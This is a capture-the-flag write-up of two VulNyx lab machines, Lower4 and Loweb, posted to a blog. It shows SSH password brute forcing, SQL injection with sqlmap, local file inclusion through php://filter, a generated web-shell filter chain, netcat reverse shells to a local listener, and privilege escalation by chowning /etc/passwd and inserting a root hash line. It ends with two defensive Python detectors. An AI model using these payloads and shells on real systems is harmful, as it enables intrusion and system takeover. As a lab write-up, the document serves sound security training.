VulNyx

Lower4

Information gathering

This VulNyx box is quite friendly: it comes in bridged mode out of the box and prints its IP address for you, so just switch Kali to bridged mode as well. The target's IP address is 192.168.1.103. Scan the ports:

┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.103                                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 00:27 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.98% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.44% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.20% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.74% done; ETC: 00:27 (0:00:00 remaining)
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
113/tcp open  ident
MAC Address: 00:0C:29:46:81:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds

Ports 22, 80 and 113 are open. A quick look at port 80 shows only the default Apache page, and a directory scan turned up nothing, so port 113 is the one to look at. I didn't know the ident service at first, so I switched to coward mode and read a writeup, and found some background on the ident protocol at https://book.hacktricks.wiki/zh/network-services-pentesting/113-pentesting-ident.html

The Ident protocol is used to associate a TCP connection with a specific user across the Internet. Originally designed to help with network management and security, it works by letting a server query the client on port 113 for information about the user behind a specific TCP connection.

However, because of modern privacy concerns and the potential for abuse, its use has declined, since it can inadvertently leak user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks.

Default port: 113

PORT    STATE SERVICE
113/tcp open  ident

One useful point: when nmap is run with -sC, the auth-owners script queries ident and reports the user that owns each open port.

Port 113 exploitation: user flag

┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 01:23 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
|_auth-owners: root
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp  open  http
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident
|_auth-owners: lucifer
MAC Address: 00:0C:29:46:81:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds

This confirms that the user behind port 113 is lucifer. The site above also mentions a tool, ident-user-enum (https://github.com/pentestmonkey/ident-user-enum), which is simple to use: run ident-user-enum with the host and port and it reports the user owning that port.

┌──(root㉿kali-plus)-[~/ident-user-enum-master]
└─# ident-user-enum 192.168.1.103 113
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.1.103:113	lucifer

With a username in hand, the next step is brute force. Port 80 has nothing, which leaves SSH on port 22, so use Hydra to brute-force the SSH password:

┌──(root㉿kali-plus)-[~]
└─# hydra -l lucifer -P 1000.txt -t 10 ssh://192.168.1.103
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 01:51:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 1425 login tries (l:1/p:1425), ~143 tries per task
[DATA] attacking ssh://192.168.1.103:22/
[22][ssh] host: 192.168.1.103   login: lucifer   password: 789456123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-16 01:51:17

This shows that finding a wordlist that matches the challenge matters too. Next is the SSH login; once connected there is a user.txt:

lucifer@lower4:~$ cat user.txt
8e99e9f5a7d2d7a067314e34d9fd957f

Next is privilege escalation. First run sudo -l to see what can be executed as root.

Privilege escalation: root flag

lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail

This tool can't escalate privileges directly, but its manual shows that pressing a inside the tool opens a command prompt, so try a reverse shell from there:

┌──(root㉿kali-plus)-[/usr/share/wordlists]
└─# nc -lvvp 4444
Listening on 0.0.0.0 4444
id
Connection received on bogon 58762
uid=0(root) gid=0(root) grupos=0(root)
ls
user.txt
ls /
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
user.txt
pwd
/home/lucifer
cd /root
ls
root.txt
cat root.txt
c07db370f9e16dcde97d554b38c9c08e

Loweb

Information gathering

The IP address is 192.168.1.103; gather port information:

┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103 -p-  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 23:26 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:B9:80:D2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds

Ports 80 and 22 are open. Port 80 is an Apache default page with nothing else on it, so scan for directories:

┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/       
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.1.103/__25-03-17_23-28-51.txt

Target: http://192.168.1.103/

[23:28:51] Starting: 
[23:28:53] 403 -  278B  - /.ht_wsr.txt                                      
[23:28:53] 403 -  278B  - /.htaccess.bak1                                   
[23:28:53] 403 -  278B  - /.htaccess.sample                                 
[23:28:53] 403 -  278B  - /.htaccess.orig
[23:28:53] 403 -  278B  - /.htaccess.save
[23:28:53] 403 -  278B  - /.htaccess_extra                                  
[23:28:53] 403 -  278B  - /.htaccess_sc
[23:28:53] 403 -  278B  - /.htaccessOLD                                     
[23:28:53] 403 -  278B  - /.htaccessOLD2
[23:28:53] 403 -  278B  - /.htaccess_orig
[23:28:53] 403 -  278B  - /.htm                                             
[23:28:53] 403 -  278B  - /.html
[23:28:53] 403 -  278B  - /.htaccessBAK                                     
[23:28:53] 403 -  278B  - /.htpasswd_test                                   
[23:28:53] 403 -  278B  - /.htpasswds                                       
[23:28:53] 403 -  278B  - /.httr-oauth
[23:28:54] 403 -  278B  - /.php                                             
[23:29:13] 301 -  316B  - /library  ->  http://192.168.1.103/library/       
[23:29:21] 403 -  278B  - /server-status/                                   
[23:29:21] 403 -  278B  - /server-status
                                                                             
Task Completed

There is a /library directory, but visiting it gives nothing of value, so scan again with /library appended:

┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/library
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.1.103/_library_25-03-17_23-32-17.txt

Target: http://192.168.1.103/

[23:32:18] Starting: library/
[23:32:19] 403 -  278B  - /library/.ht_wsr.txt                              
[23:32:19] 403 -  278B  - /library/.htaccess.bak1                           
[23:32:19] 403 -  278B  - /library/.htaccess.sample
[23:32:19] 403 -  278B  - /library/.htaccess.save                           
[23:32:19] 403 -  278B  - /library/.htaccess.orig                           
[23:32:19] 403 -  278B  - /library/.htaccess_extra
[23:32:19] 403 -  278B  - /library/.htaccess_orig
[23:32:19] 403 -  278B  - /library/.htaccess_sc
[23:32:19] 403 -  278B  - /library/.htaccessOLD
[23:32:19] 403 -  278B  - /library/.htaccessBAK                             
[23:32:19] 403 -  278B  - /library/.htaccessOLD2                            
[23:32:19] 403 -  278B  - /library/.htm
[23:32:19] 403 -  278B  - /library/.html
[23:32:19] 403 -  278B  - /library/.htpasswd_test                           
[23:32:19] 403 -  278B  - /library/.htpasswds
[23:32:19] 403 -  278B  - /library/.httr-oauth
[23:32:20] 403 -  278B  - /library/.php                                     
[23:32:23] 301 -  322B  - /library/admin  ->  http://192.168.1.103/library/admin/
[23:32:24] 302 -    0B  - /library/admin/  ->  /library/login/index.php     
[23:32:24] 302 -    0B  - /library/admin/index.php  ->  /library/login/index.php
[23:32:39] 301 -  322B  - /library/login  ->  http://192.168.1.103/library/login/
[23:32:39] 200 -  793B  - /library/login/                                   
                                                                             
Task Completed

There is a login page, but no weak password worked, so I guessed SQL injection: save the login request to a txt file and let sqlmap run on it.

Running sqlmap -l Loweb.txt --batch shows a pause, which indicates SQL injection in the login. Testing the username admin1' or 1=1 -- - with any password logs you in; admin/admin1' or 1=1 -- - also gets in. Once inside there's another username, r3dh4ck, along with a lot of familiar names, though those don't seem to be useful. Next, see whether sqlmap can dump the passwords:

sqlmap -l Loweb.txt --batch --dbs
sqlmap -l Loweb.txt --batch -D library --tables
sqlmap -l Loweb.txt --batch -D library -T user --columns
sqlmap -l Loweb.txt --batch -D library -T user -C password --dump
$2y$10$AkhF2T9slTqNPbwh6eRbVeLr5XW8ZqWvJ/zFapZ7Y8ZK0G70Hxo3W
vi Loweb-tmp
john Loweb-tmp --wordlist=/usr/share/wordlists/rockyou.txt

The dumped hash wouldn't crack, so another route was needed. While going through the page source I noticed index.php?lang=en.php and tried it for arbitrary file read: ../../../../../../../etc/passwd returns the user list:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
r3dh4ck:x:1000:1000::/home/r3dh4ck:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false

Try to read the source: ?lang=php://filter/read=convert.base64-encode/resource=index.php

<?php
session_start();
if(!isset($_SESSION['username'])){
    header('Location: /library/login/index.php');
    exit;
}
?>
<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>Admin Panel</title>
  <link rel='stylesheet' href='//code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css'><link rel="stylesheet" href="./style.php">

</head>
<body>
<!-- partial:index.partial.html -->
<div class="container">
  <div class="drawer">
    <a class="navicon" href="#"><i class="icon ion-navicon"></i></a>
    <div class="menu">
      <a data-menu="dashboard" href="#" class="active"><i class="icon ion-home"></i></a>
      <a data-menu="users" href="#"><i class="icon ion-person-stalker"></i></a>
      <a data-dialog="logout" href="#"><i class="icon ion-log-out"></i></a>
      <a data-menu="download" href="#"><i class="icon ion-code-download"></i></a>
      <a data-menu="about" href="#"><i class="icon ion-information-circled"></i></a>
    </div>
    <span class="credits">VulNyx - Jackie0x17</span>
  </div>
  <div class="content">
    <div class="page active" data-page="dashboard">
      <div class="header">
        <div class="title">
          <h2>Dashboard</h2>
        </div>
      </div>
      <div class="grid">
        <div class="card">
          <div class="head">
            <span class="icon">
              <i class="icon ion-pound"></i>
            </span>
            <span class="stat">
              Server Status
            </span>
            <div class="status">
            </div>
          </div>
          <div class="body">
            <h2>Server is currently $_status</h2>
            <p>
              The server is running normally and no issues have recently been detected. If you notice an outage, please report it to the administrator.
            </p>
          </div>
          <div class="footer">
            <div class="user">
              <div class="user-icon">
              </div>
              <span class="username">
                admin
              </span>
            </div>
          </div>
        </div>
        <div class="card">
          <div class="head">
            <span class="icon">
              <i class="icon ion-code-working"></i>
            </span>
            <span class="stat">
              VulNyx Status
            </span>
            <div class="status">
            </div>
          </div>
          <div class="body">
            <h2>Cheat is currently $_status</h2>
            <p>
              The server is running normally and no issues have recently been detected. If you notice an outage, please report it to the administrator.
            </p>
          </div>
          <div class="footer">
            <div class="user">
              <div class="user-icon">
              </div>
              <span class="username">
                r3dh4ck
              </span>
            </div>
          </div>
        </div>
        <div class="card-verticle">
          <div class="card-small">
            <span class="title">
              Active Users
            </span>
            <h2 class="text">12</h2>
            <div class="graph">
              <div class="bar" data-day="sunday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="monday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="tuesday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="wednesday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="thursday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="friday">
                <div class="bar-content"></div>
              </div>
              <div class="bar" data-day="saturday">
                <div class="bar-content"></div>
              </div>
            </div>
          </div>
          <div class="card-small">
            <span class="title">
              Overview
            </span>
          </div>
        </div>
      </div>
      <div class="stats">
      </div>
    </div>
    <div class="page noflex" data-page="users">
      <div class="header">
        <div class="title">
          <h2>Users</h2>
        </div>
      </div>
      <div class="grid">
        <div class="user-edit">
          <div class="header">
            <span class="icon">
              <i class="icon ion-person"></i>
            </span>
            <span class="user-edit-name">$_USERNAME</span>
            <a href="#" class="close"><i class="icon ion-close-round"></i></a>
          </div>
        </div>
        <div class="users-table">
          <div class="users-item header">
            <div class="table-item noflex">
              ID
            </div>
            <div class="table-item">
              Email Address
            </div>
            <div class="table-item">
              Username
            </div>
            <div class="table-item">
              Nickname
            </div>
            <div class="table-item">
              Active
            </div>
            <div class="table-item">
              Premium
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="page noflex" data-page="download">
      <div class="header">
        <div class="title">
          <h2>Download</h2>
        </div>
      </div>
      <div class="grid">
        <div class="card wide">
          <div class="head">
            <span class="icon">
              <i class="icon ion-code-working"></i>
            </span>
            <span class="stat">
              Cheat Client
            </span>
            <div class="status">
            </div>
          </div>
          <div class="body">
            <h2>Latest Version: v$_VERSION</h2>
            <p>
              changelog here
            </p>
          </div>
          <div class="footer">
            <div class="user">
              <div class="user-icon">
              </div>
              <span class="username">
                Administrator 
              </span>
            </div>
            <a class="download" href="#">Download <i class="icon ion-archive"></i></a>
          </div>
        </div>
      </div>
    </div>
    <div class="page noflex" data-page="about">
      <div class="header">
        <div class="title">
          <h2>About</h2>
        </div>
      </div>
      <div class="info-container">
        <div class="info">
          <a href="http://uplusion23.net/" target="_blank">Developer</a>
          <span>uplusion23</span>
        </div>
        <div class="info">
          <a href="#" target="_blank">Dashboard Version</a>
          <span>1.0.0</span>
        </div>
        <div class="info">
          <a href="#" target="language">Language</a>
          <span>
	    <a href="index.php?lang=es.php">es</a>
            <a href="index.php?lang=en.php">en</a>
	  </span>
        </div>
      </div>
    </div>
  </div>
  <div class="sidebar">

  </div>
  <div class="dialog">
    <div class="dialog-block">
      <h2>Are you sure you want to logout?</h2>
      <div class="controls">
        <a href="../login/index.php" class="button">Logout</a>
        <a data-dialog-action="cancel" href="#" class="button">Cancel</a>
      </div>
    </div>
  </div>
</div>
<!-- partial -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script><script  src="./script.php"></script>

</body>
</html>
<?php
$lang = isset($_GET['lang']) ? $_GET['lang'] : '';

include($lang)
?>

The unfiltered include at the very end is the web-shell entry point; use the php_filter_chain_generator tool to generate the payload:

┌──(root㉿kali-plus)-[/home/test/Desktop/php_filter_chain_generator]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)

Then append &a=busybox nc 192.168.1.104 4444 -e /bin/bash. The first attempt with plain nc didn't call back, so I switched to busybox. After getting the shell I ran the usual command to spawn an interactive shell, but for some reason it didn't work; never mind, it's usable without one. I thought that would be enough to get user.txt, but the permissions weren't sufficient: the shell lands in the web root directory as the web user, so I still had to switch users. After a long search I found a monitor.sh file in /opt:
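As an added defensive example (not code from the box or from this writeup), the following Python script scans Apache access log lines for the kind of lang values that the unfiltered include($lang) above accepts: directory traversal, stream wrappers, and php://filter chains. The sample log lines and the /library/admin/index.php path are constructed assumptions; the allowlist mirrors the only two files the About panel links to, which is also the fix for the include itself.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The only values the dashboard's About panel links to; anything else reaching
# include($lang) is an abuse attempt. The same allowlist is the fix for the include.
ALLOWED_LANG = {"en.php", "es.php"}

# Apache "combined" log format, enough to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines; the /library/admin/index.php path is an assumption.
SAMPLE_LOG = [
    '192.168.1.104 - - [17/Mar/2025:23:50:01 +0800] "GET /library/admin/index.php?lang=en.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.1.104 - - [17/Mar/2025:23:51:12 +0800] "GET /library/admin/index.php?lang=../../../../../../../etc/passwd HTTP/1.1" 200 2011 "-" "Mozilla/5.0"',
    '192.168.1.104 - - [17/Mar/2025:23:52:40 +0800] "GET /library/admin/index.php?lang=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    '192.168.1.104 - - [17/Mar/2025:23:55:03 +0800] "GET /library/admin/index.php?lang=php://filter/convert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-encode%7Cconvert.base64-decode/resource=php://temp&a=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
]


def classify_lang(value):
    """Return the reasons one lang value looks like include() abuse ([] if benign)."""
    if value in ALLOWED_LANG:
        return []
    reasons = []
    if ".." in value or value.startswith("/"):
        reasons.append("path traversal")        # ../../etc/passwd style reads
    if "://" in value or value.startswith("data:"):
        reasons.append("stream wrapper")        # php://, expect://, data: ...
    if "convert.iconv" in value or "convert.base64" in value:
        reasons.append("php filter chain")      # source disclosure or generated chains
    if not reasons:
        reasons.append("not in allowlist")      # unknown file name, still worth a look
    return reasons


def scan_access_log(lines):
    """Return (client_ip, lang_value, reasons, other_params) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qs percent-decodes once; blanks kept so a bare "lang=" is still inspected
        params = parse_qs(url.query, keep_blank_values=True)
        for lang in params.get("lang", []):
            reasons = classify_lang(lang)
            if reasons:
                # extra parameters next to a wrapper (e.g. a=<cmd>) hint at command execution
                others = sorted(k for k in params if k != "lang")
                findings.append((m.group("ip"), lang, reasons, others))
    return findings


if __name__ == "__main__":
    for ip, lang, reasons, others in scan_access_log(SAMPLE_LOG):
        print(f"{ip}  lang={lang[:60]!r}  {', '.join(reasons)}  extra={others}")
```

A real deployment would feed the live access log through scan_access_log and alert on any finding, since legitimate traffic to this page only ever carries en.php or es.php.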

User flag

#!/bin/bash

LOGDIR="/var/log/monitor"
LOGFILE="$LOGDIR/system_monitor_$(date +%Y%m%d%H%M%S).log"

mkdir -p $LOGDIR

echo "=== Monitoring started: $(date) ===" >> $LOGFILE

echo ">> Open ports and associated processes:" >> $LOGFILE
ss -tulpn | grep LISTEN >> $LOGFILE 2>/dev/null

echo -e "\n>> Currently connected users:" >> $LOGFILE
who >> $LOGFILE

echo -e "\n>> System information:" >> $LOGFILE
echo "Hostname: $(hostname)" >> $LOGFILE
echo "Kernel version: $(uname -r)" >> $LOGFILE
echo "Uptime: $(uptime -p)" >> $LOGFILE

echo -e "\n>> Generating simulated credentials for audit:" >> $LOGFILE
SECRET_USER="r3dh4ck"
SECRET_PASS="contraseñaconÑjeje" # Change this password for the future
echo "User: SECRET_USER" >> $LOGFILE
echo "Password: SECRET_PASS" >> $LOGFILE

echo -e "\n>> Possible suspicious processes running:" >> $LOGFILE
ps aux | grep -i 'nc\|netcat\|ncat\|bash\|sh' | grep -v grep >> $LOGFILE

echo -e "\n=== Monitoring finished: $(date) ===" >> $LOGFILE

This gives the password contraseñaconÑjeje

su - r3dh4ck
contraseñaconÑjeje
id
uid=1000(r3dh4ck) gid=1000(r3dh4ck) groups=1000(r3dh4ck)

The user switch worked, but user.txt still isn't readable, so change its owner directly:

sudo /usr/bin/chown r3dh4ck:r3dh4ck user.txt

That gives the user flag:

ed568ec0cd3aef96d4c17a7f02a8391e

Privilege escalation: root flag

Explanation and usage of chown: https://www.runoob.com/linux/linux-comm-chown.html

chown <user> <file>, for example: chown root /root/root.txt

sudo /usr/bin/chown r3dh4ck /etc/passwd
sed -i '1i root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' /etc/passwd
root@loweb:~# cat r00t.txt
f6a0195e175989b2f9dd92fe4e35d6e4
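As an added example (not from the box or from this writeup), this Python audit flags what the two steps above leave behind on the host: /etc/passwd no longer owned by root, and a second UID 0 entry carrying an inline hash. The sample passwd content is constructed from the entries shown earlier on this page; audit_file() runs the same checks against the real file.

```python
import os
import stat
from collections import Counter

# Constructed /etc/passwd content: entries from the box's file plus the extra
# "root" line that the sed command above inserts (a second UID 0 with an inline hash).
SAMPLE_PASSWD = """root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
r3dh4ck:x:1000:1000::/home/r3dh4ck:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
"""


def parse_passwd(text):
    """Split passwd text into entries; malformed lines come back with a 'malformed' key."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            entries.append({"line": n, "malformed": line})
            continue
        entries.append({"line": n, "name": f[0], "pw": f[1], "uid": int(f[2]),
                        "gid": int(f[3]), "home": f[5], "shell": f[6]})
    return entries


def audit_passwd(text, owner_uid=0, mode=0o644):
    """Return (severity, message) findings for passwd content and its file metadata."""
    findings = []
    # Metadata: once a normal user owns the file (the chown above), content is attacker-controlled.
    if owner_uid != 0:
        findings.append(("critical", f"/etc/passwd owned by uid {owner_uid}, not root"))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("critical", "/etc/passwd is group- or world-writable"))
    entries = parse_passwd(text)
    for e in entries:
        if "malformed" in e:
            findings.append(("warning", f"line {e['line']}: malformed entry {e['malformed']!r}"))
    good = [e for e in entries if "malformed" not in e]
    # Content: more than one UID 0, a hash in the password field, duplicate names.
    uid0 = [e["name"] for e in good if e["uid"] == 0]
    if len(uid0) > 1:
        findings.append(("critical", f"multiple UID 0 accounts: {', '.join(uid0)}"))
    for e in good:
        if e["pw"] not in ("x", "*", "!", "!!", ""):
            findings.append(("critical",
                             f"line {e['line']}: inline password hash for {e['name']} "
                             "(hashes belong in /etc/shadow)"))
    for name, count in Counter(e["name"] for e in good).items():
        if count > 1:
            findings.append(("warning", f"duplicate account name {name} ({count} entries)"))
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit against a real file, taking owner and mode from the filesystem."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_passwd(text, owner_uid=st.st_uid, mode=stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    for severity, message in audit_passwd(SAMPLE_PASSWD, owner_uid=1000):
        print(f"[{severity}] {message}")
```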
posted @ 2025-04-26 01:40  L4g0M